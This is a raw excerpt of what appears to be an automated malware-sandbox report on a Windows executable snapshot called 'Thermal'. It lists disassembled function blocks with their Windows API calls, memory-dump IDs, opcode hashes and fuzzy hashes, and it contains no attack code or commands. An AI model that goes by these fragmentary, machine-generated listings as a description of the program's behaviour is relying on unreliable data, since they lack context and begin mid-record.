                                                      • String ID: Bad directive syntax error
                                                      APIs
                                                        • Part of subcall function 00134AB2: __fread_nolock.LIBCMT ref: 00134AD0
                                                      • _wcscmp.LIBCMT ref: 00189DE1
                                                      • _wcscmp.LIBCMT ref: 00189DF4
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      APIs
                                                      • _memset.LIBCMT ref: 0017032B
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00170375
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                        • Part of subcall function 001409C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001409E4
                                                      Strings
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      APIs
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001407EC
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 001407F4
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001407FF
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0014080A
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00140812
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0014081A
                                                        • Part of subcall function 0013FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0012AC6B), ref: 0013FFA7
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0012AD08
                                                      • OleInitialize.OLE32(00000000), ref: 0012AD85
                                                      • CloseHandle.KERNEL32(00000000), ref: 00162F56
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      APIs
                                                      • _memset.LIBCMT ref: 001359F9
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00135A9E
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00135ABB
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 803312d0ae40d123fdb320495a29cb4999d838cb2331436b13f76202dd3e7224
                                                      • Instruction ID: 6698d7bb1dc6965e31abe558acb5e16f32795a44170f5ea3a9e5531a5dcb951d
                                                      • Opcode Fuzzy Hash: 803312d0ae40d123fdb320495a29cb4999d838cb2331436b13f76202dd3e7224
                                                      • Instruction Fuzzy Hash: 743182B0505B018FD725DF74D8C569BBBF8FB58704F000A2EF69A87290E771A984DB52
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00145953
                                                        • Part of subcall function 0014A39B: __NMSG_WRITE.LIBCMT ref: 0014A3C2
                                                        • Part of subcall function 0014A39B: __NMSG_WRITE.LIBCMT ref: 0014A3CC
                                                      • __NMSG_WRITE.LIBCMT ref: 0014595A
                                                        • Part of subcall function 0014A3F8: GetModuleFileNameW.KERNEL32(00000000,001E53BA,00000104,00000004,00000001,00141003), ref: 0014A48A
                                                        • Part of subcall function 0014A3F8: ___crtMessageBoxW.LIBCMT ref: 0014A538
                                                        • Part of subcall function 001432CF: ___crtCorExitProcess.LIBCMT ref: 001432D5
                                                        • Part of subcall function 001432CF: ExitProcess.KERNEL32 ref: 001432DE
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      • RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,?,00000004,?,?,00141003,?), ref: 0014597F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: bca4931a23b63b58b12e5961c3db336bf954116403c9802ce3357d28622ceaeb
                                                      • Instruction ID: e0246379eba19fb90469eb83b47f32fcbfbad3db0df5052d943b4252c63f303e
                                                      • Opcode Fuzzy Hash: bca4931a23b63b58b12e5961c3db336bf954116403c9802ce3357d28622ceaeb
                                                      • Instruction Fuzzy Hash: E301F131342B42EBE7153BA4DC42A2E334AAF62778F510536F525AE1F2DF708D414761
                                                      APIs
                                                      • _free.LIBCMT ref: 001892D6
                                                        • Part of subcall function 00142F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142F99
                                                        • Part of subcall function 00142F85: GetLastError.KERNEL32(00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142FAB
                                                      • _free.LIBCMT ref: 001892E7
                                                      • _free.LIBCMT ref: 001892F9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                      • Instruction ID: 3ef410a947688bed710ca2984bc55ad94f4dfc8e6f6eed162b90e30975ad7283
                                                      • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                      • Instruction Fuzzy Hash: 65E0C2A120462253CA20B5386C40EA377EC0F88391798050DF409D3142CF70F8808628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 415bc1ceb0a39b447ffd2e7e01daedce88e26ac405aa0f32da1ec9c1497a6048
                                                      • Instruction ID: 4c7608d56422963c86d821b8743ad0d0fc88740bfba4fd2abcf6d4c5be0504e1
                                                      • Opcode Fuzzy Hash: 415bc1ceb0a39b447ffd2e7e01daedce88e26ac405aa0f32da1ec9c1497a6048
                                                      • Instruction Fuzzy Hash: 1B326A70508351DFCB28DF14D490A2AB7E1BF94304F15896DF89A9B3A2D731EDA5CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: 6b393f4b6032de5e33068d7c6f6c7bec10c56a3dae60fc4a8bcf97700ea7af04
                                                      • Instruction ID: 1445bc240ccc83987fa9e2caa3663a42b1d7c7c3e55cf60295ebe8d740a8ed43
                                                      • Opcode Fuzzy Hash: 6b393f4b6032de5e33068d7c6f6c7bec10c56a3dae60fc4a8bcf97700ea7af04
                                                      • Instruction Fuzzy Hash: 9041B021E042589BDF269B548C517BF7FB19B5D324F294075F886E7286C720AD84C3E2
                                                      APIs
                                                      • _strcat.LIBCMT ref: 0019E20C
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • _wcscpy.LIBCMT ref: 0019E29B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1012013722-0
                                                      • Opcode ID: c4242f8c0116a65a187b4a15c73e390c3b296cbdcc7a8c5ba3417b4ac82b31b6
                                                      • Instruction ID: bb4796595e51d8022c6fe24092480439fde402763bdcf9106f99a5042148a1ca
                                                      • Opcode Fuzzy Hash: c4242f8c0116a65a187b4a15c73e390c3b296cbdcc7a8c5ba3417b4ac82b31b6
                                                      • Instruction Fuzzy Hash: 49911735A00614DFCB18DF28D5819ADBBE5FF59310B95805AF81A8F366EB30EE51CB81
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3712363035-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: aff9baa43f35d3d7b9f333017e6d9b09ba6e5267e6993e042b880f6c392b9c72
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: DE31E671A00109DFC71ADF5AC480969F7A6FF89310B658AA5E509EF262E731EDD1CBC0
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00135FEF
                                                        • Part of subcall function 0014359C: __lock.LIBCMT ref: 001435A2
                                                        • Part of subcall function 0014359C: DecodePointer.KERNEL32(00000001,?,00136004,00178892), ref: 001435AE
                                                        • Part of subcall function 0014359C: EncodePointer.KERNEL32(?,?,00136004,00178892), ref: 001435B9
                                                        • Part of subcall function 00135F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00135F18
                                                        • Part of subcall function 00135F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00135F2D
                                                        • Part of subcall function 00135240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0013526C
                                                        • Part of subcall function 00135240: IsDebuggerPresent.KERNEL32 ref: 0013527E
                                                        • Part of subcall function 00135240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 001352E6
                                                        • Part of subcall function 00135240: SetCurrentDirectoryW.KERNEL32(?), ref: 00135366
                                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0013602F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: ed72f5232d3b3f3bcc16975463d056df4b477888f0ca69847ffb8fe0d95731f4
                                                      • Instruction ID: 57912bd3a46b5751b09d4e1da001032fac7777e40bf7408d93c3965ef7c345fd
                                                      • Opcode Fuzzy Hash: ed72f5232d3b3f3bcc16975463d056df4b477888f0ca69847ffb8fe0d95731f4
                                                      • Instruction Fuzzy Hash: 58118C718083469BD310DFA8EC8590EFBE8EFA8710F00851AF5949B2B1DB709584CF96
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00133E72,?,?,?,00000000), ref: 00134327
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00133E72,?,?,?,00000000), ref: 00170717
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 6bef6978adaa3a9c208d460899d93d216d7e6ce286b907c4b71abb8d3803dfa4
                                                      • Instruction ID: a7cb8c3b91a1cb7bf4ed5bac95be84b2bf42b8c79319f02176b96432b64eb196
                                                      • Opcode Fuzzy Hash: 6bef6978adaa3a9c208d460899d93d216d7e6ce286b907c4b71abb8d3803dfa4
                                                      • Instruction Fuzzy Hash: C5014070244319BFF3251E28CC8AF667A9CFB15768F50C319FAE56A1E0C7B5AC858B14
                                                      APIs
                                                        • Part of subcall function 0014593C: __FF_MSGBANNER.LIBCMT ref: 00145953
                                                        • Part of subcall function 0014593C: __NMSG_WRITE.LIBCMT ref: 0014595A
                                                        • Part of subcall function 0014593C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,?,00000004,?,?,00141003,?), ref: 0014597F
                                                      • std::exception::exception.LIBCMT ref: 0014101C
                                                      • __CxxThrowException@8.LIBCMT ref: 00141031
                                                        • Part of subcall function 001487CB: RaiseException.KERNEL32(?,?,?,001DCAF8,?,?,?,?,?,00141036,?,001DCAF8,?,00000001), ref: 00148820
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: bcdba8aed9a2d5ece02b63fee4772d8912814fab82df5dd00e74bcccf536df49
                                                      • Instruction ID: 8045099b5190192dd9be48774c5d3d630a04aaf7d0af9626bf98adaf6f332022
                                                      • Opcode Fuzzy Hash: bcdba8aed9a2d5ece02b63fee4772d8912814fab82df5dd00e74bcccf536df49
                                                      • Instruction Fuzzy Hash: 34F0283550420DB3CB20FA98ED159DE7BAC9F11310F100426F924A72B1DFB08B91D2E0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: e32d6c4ecad2fc618474cc201a8db896b25acebf67eddfeb03a43732d2ad78ab
                                                      • Instruction ID: d2fed6b3dca1fd9deb0c8c6ba687eed5e8d611c732bfef6870352f0c942f8aa9
                                                      • Opcode Fuzzy Hash: e32d6c4ecad2fc618474cc201a8db896b25acebf67eddfeb03a43732d2ad78ab
                                                      • Instruction Fuzzy Hash: 44016C71C00749EBCF11AF66CC0199F7B62AF50760F144115F828571B2DB318A51DF91
                                                      APIs
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      • __lock_file.LIBCMT ref: 0014560B
                                                        • Part of subcall function 00146E3E: __lock.LIBCMT ref: 00146E61
                                                      • __fclose_nolock.LIBCMT ref: 00145616
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 4f952236db8a2a8b9b436b3b6b7e3465c4cb59dad5b5b7988ba4a70ccc5a1454
                                                      • Instruction ID: 2110ca561ecf81110b829f1148ae06da85fee692837d3ebe7cb4a2e70f8ba09a
                                                      • Opcode Fuzzy Hash: 4f952236db8a2a8b9b436b3b6b7e3465c4cb59dad5b5b7988ba4a70ccc5a1454
                                                      • Instruction Fuzzy Hash: AAF09072802B059BD720BB65880276E67E26F61335F168209A424AB1E2CB7C49419B51
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00145EB4
                                                      • __ftell_nolock.LIBCMT ref: 00145EBF
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Similarity
                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2999321469-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00135AEF
                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00135B1F
                                                      Similarity
                                                      • API ID: IconNotifyShell__memset
                                                      • String ID:
                                                      • API String ID: 928536360-0
                                                      Similarity
                                                      • API ID: LoadString$__swprintf
                                                      • String ID:
                                                      • API String ID: 207118244-0
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 001341B2
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      APIs
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      APIs
                                                        • Part of subcall function 00134B29: FreeLibrary.KERNEL32(00000000,?), ref: 00134B63
                                                        • Part of subcall function 0014547B: __wfsopen.LIBCMT ref: 00145486
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001327AF,?,00000001), ref: 001349F4
                                                        • Part of subcall function 00134ADE: FreeLibrary.KERNEL32(00000000), ref: 00134B18
                                                        • Part of subcall function 001348B0: _memmove.LIBCMT ref: 001348FA
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      APIs
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      APIs
                                                      • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00133CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00134276
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      APIs
                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00194998
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID:
                                                      • API String ID: 1431749950-0
                                                      APIs
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                      • _memset.LIBCMT ref: 00187CB4
                                                      Similarity
                                                      • API ID: Exception@8Throw_memsetstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 525207782-0
                                                      APIs
                                                      Similarity
                                                      • API ID: _fseek
                                                      • String ID:
                                                      • API String ID: 2937370855-0
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,001327AF,?,00000001), ref: 00134A63
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001409E4
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00184D31
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Similarity
                                                      • API ID: FolderPath_memmove
                                                      • String ID:
                                                      • API String ID: 3334745507-0
                                                      APIs
                                                        • Part of subcall function 0018384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00183959,00000000,00000000,?,001705DB,001D8070,00000002,?,?), ref: 001838CA
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,001705DB,001D8070,00000002,?,?,?,00000000), ref: 00183967
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID:
                                                      • API String ID: 539440098-0
                                                      APIs
                                                      • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00183E7D,?,?,?), ref: 00183F0D
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,001706E6,00000000,00000000,00000000), ref: 001342BF
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      APIs
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 0018D842
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      APIs
                                                        • Part of subcall function 00184005: FindFirstFileW.KERNEL32(?,?), ref: 0018407C
                                                        • Part of subcall function 00184005: DeleteFileW.KERNEL32(?,?,?,?), ref: 001840CC
                                                        • Part of subcall function 00184005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001840DD
                                                        • Part of subcall function 00184005: FindClose.KERNEL32(00000000), ref: 001840F4
                                                      • GetLastError.KERNEL32 ref: 0018C292
                                                      Similarity
                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2191629493-0
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,00000000,00162F8B), ref: 001342EF
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001AD208
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001AD249
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001AD28E
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001AD2B8
                                                      • SendMessageW.USER32 ref: 001AD2E1
                                                      • _wcsncpy.LIBCMT ref: 001AD359
                                                      • GetKeyState.USER32(00000011), ref: 001AD37A
